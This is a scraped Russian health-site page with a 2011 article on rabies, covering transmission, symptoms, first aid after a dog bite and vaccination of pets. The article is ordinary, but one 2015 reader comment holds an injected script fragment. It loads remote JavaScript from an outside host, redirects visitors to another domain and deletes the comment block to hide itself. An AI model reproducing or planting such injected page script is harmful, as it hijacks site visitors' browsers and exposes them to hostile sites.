Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Бешенство: как не озверет...  >>  Бешенство: как не озвереть?
 
Обратная связь
 

Бешенство: как не озвереть?

Размер шрифта
10 октября 2011 06:34
  • google_analytics: false
  • Нравится

Лекарство от этой смертельной болезни не могли придумать долгие годы, и диагноз «бешенство» был равносилен смертному приговору. Впрочем, и сегодня, если болезнь не предупредить, от нее умирают.

1

Кто переносит заболевание?

В 90% случаев причиной бешенства является укус собаки, хотя бешенством можно заразиться и от кошки, лисы или даже летучей мыши.

Механизм заражения

После укуса, вместе со слюной животного в кровь попадает вирус бешенства, который медленно по нервным окончаниям поднимается в мозг и вызывает его воспаление. Инкубационный период заболевания составляет 50-60 дней после укуса. Чем дальше от головы укус, тем длительнее инкубационный период, потому что вирус должен подняться в головной мозг.

Симптомы

Длится заболевание 10-12 дней. Первые симптомы – это небольшая слабость. Человек постепенно становится очень раздражительным. Развиваются светобоязнь и водобоязнь. На конечных стадиях наступает паралич глазных мышц и нижних конечностей. Умирает человек в результате остановки дыхания.

Что делать, если укусила собака?

  1. 1.

    Если вас укусила собака, не стоит ждать первых симптомов. Их появление уже означает… скорую смерть. Из всех заболевших бешенством выживают единицы.

  2. 2.

    Если вас все-таки укусило животное, то немедленно промойте рану и уберите остатки слюны. После этого незамедлительно отправляйтесь к врачу. Альтернатива своевременному лечению – только несвоевременная смерть.

  3. 3.

    Не надо бояться «сорока уколов в живот». Они уже давно в прошлом. Современные препараты требуют куда меньшего числа уколов.

О чем надо помнить хозяевам собак и кошек?

  1. 1.

    Заранее диагностировать бешенство у собственного животного – нелегко. Часто такой диагноз ставится лишь после его смерти. Так что обращайте внимание на любую странность в поведении домашнего любимца:

• Беспричинная смена настроения
• Потеря аппетита
• Агрессия на все живое и неживое
• Меняется тембр голоса (вирус бешенства влияет и на голосовые связки)
  1. 2.

    Если животное заболело бешенством, ему одна дорога – на усыпление. Если хотите себя обезопасить, обязательно сделайте животному прививку.

  2. 3.

    Если собаку вакцинировать от бешенства, то в ее организме вырабатываются антитела, которые этот вирус разрушают. Сведения о прививке от бешенства вносятся в паспорт собаки.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Слайдшоу

Как вернуться живым из отпуска    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.